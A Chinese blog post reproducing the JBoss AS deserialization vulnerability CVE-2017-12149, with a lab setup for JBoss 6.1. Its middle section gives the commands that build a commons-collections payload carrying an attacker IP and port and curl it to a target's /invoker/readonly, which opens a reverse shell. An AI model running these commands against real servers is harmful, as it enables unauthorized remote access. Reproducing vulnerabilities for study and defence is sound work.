美文网首页
JBOOS反序列化漏洞复现(CVE-2017-12149)

JBOOS反序列化漏洞复现(CVE-2017-12149)

作者: ch3ckr | 来源:发表于2017-12-15 21:06 被阅读171次
    漏洞范围:

    JBossAS 5.x~6.x

    漏洞成因:

    该漏洞存在于JBoss AS的HttpInvoker 组件中的ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

    测试目录是否存在:

    检测invoker/readonly目录是否存在,若返回500 一般就是漏洞存在。

    工具检测:

    工具一:链接-反弹shell
    1.使用vps监听一个端口

    2.进入验证工具目录下执行以下程序,生成一个ReverseShellCommonsCollectionsHashMap.ser文件

    javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
    java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap attackip:attackport
    

    3.将其发送到目标jboss的/invoker/readonly

    curl http://targetip:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
    

    4.执行完上述命令后会返回到vps一个shell

    工具二:链接-执行命令


    环境搭建:

    1.下载 JBOSS 环境,并解压.

    http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip

    2.修改配置文件,使网络中的主机都能访问 JBOSS

    具体位置:/jboss-6.1.0.Final/server/default/deploy/jbossweb.sar/server.xml

    3.启动JBOSS

    ./jboss-6.1.0.Final/bin/run.sh

    4.安装完成:

    LINK:
    1.信安之路
    2.指尖安全

    相关文章

      网友评论

          本文标题:JBOOS反序列化漏洞复现(CVE-2017-12149)

          本文链接:https://www.haomeiwen.com/subject/yxzdwxtx.html